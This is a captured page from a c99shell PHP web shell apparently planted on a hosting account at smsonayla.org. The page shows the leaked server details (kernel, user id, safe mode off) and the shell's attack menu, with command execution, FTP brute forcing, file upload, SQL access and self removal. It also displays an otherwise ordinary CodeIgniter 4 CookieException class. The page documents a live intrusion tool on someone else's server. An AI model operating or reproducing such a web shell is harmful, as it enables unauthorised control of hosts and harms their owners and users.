smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/Cookie/Exceptions/   drwxr-xr-x
Free 3468.47 GB of 4265.01 GB (81.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CookieException.php (3.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace CodeIgniter\Cookie\Exceptions;

use 
CodeIgniter\Exceptions\FrameworkException;

/**
 * CookieException is thrown for invalid cookies initialization and management.
 */
class CookieException extends FrameworkException
{
    
/**
     * Thrown for invalid type given for the "Expires" attribute.
     *
     * @return static
     */
    
public static function forInvalidExpiresTime(string $type)
    {
        return new static(
lang('Cookie.invalidExpiresTime', [$type]));
    }

    
/**
     * Thrown when the value provided for "Expires" is invalid.
     *
     * @return static
     */
    
public static function forInvalidExpiresValue()
    {
        return new static(
lang('Cookie.invalidExpiresValue'));
    }

    
/**
     * Thrown when the cookie name contains invalid characters per RFC 2616.
     *
     * @return static
     */
    
public static function forInvalidCookieName(string $name)
    {
        return new static(
lang('Cookie.invalidCookieName', [$name]));
    }

    
/**
     * Thrown when the cookie name is empty.
     *
     * @return static
     */
    
public static function forEmptyCookieName()
    {
        return new static(
lang('Cookie.emptyCookieName'));
    }

    
/**
     * Thrown when using the `__Secure-` prefix but the `Secure` attribute
     * is not set to true.
     *
     * @return static
     */
    
public static function forInvalidSecurePrefix()
    {
        return new static(
lang('Cookie.invalidSecurePrefix'));
    }

    
/**
     * Thrown when using the `__Host-` prefix but the `Secure` flag is not
     * set, the `Domain` is set, and the `Path` is not `/`.
     *
     * @return static
     */
    
public static function forInvalidHostPrefix()
    {
        return new static(
lang('Cookie.invalidHostPrefix'));
    }

    
/**
     * Thrown when the `SameSite` attribute given is not of the valid types.
     *
     * @return static
     */
    
public static function forInvalidSameSite(string $sameSite)
    {
        return new static(
lang('Cookie.invalidSameSite', [$sameSite]));
    }

    
/**
     * Thrown when the `SameSite` attribute is set to `None` but the `Secure`
     * attribute is not set.
     *
     * @return static
     */
    
public static function forInvalidSameSiteNone()
    {
        return new static(
lang('Cookie.invalidSameSiteNone'));
    }

    
/**
     * Thrown when the `CookieStore` class is filled with invalid Cookie objects.
     *
     * @param array<int|string> $data
     *
     * @return static
     */
    
public static function forInvalidCookieInstance(array $data)
    {
        return new static(
lang('Cookie.invalidCookieInstance'$data));
    }

    
/**
     * Thrown when the queried Cookie object does not exist in the cookie collection.
     *
     * @param string[] $data
     *
     * @return static
     */
    
public static function forUnknownCookieInstance(array $data)
    {
        return new static(
lang('Cookie.unknownCookieInstance'$data));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0038 ]--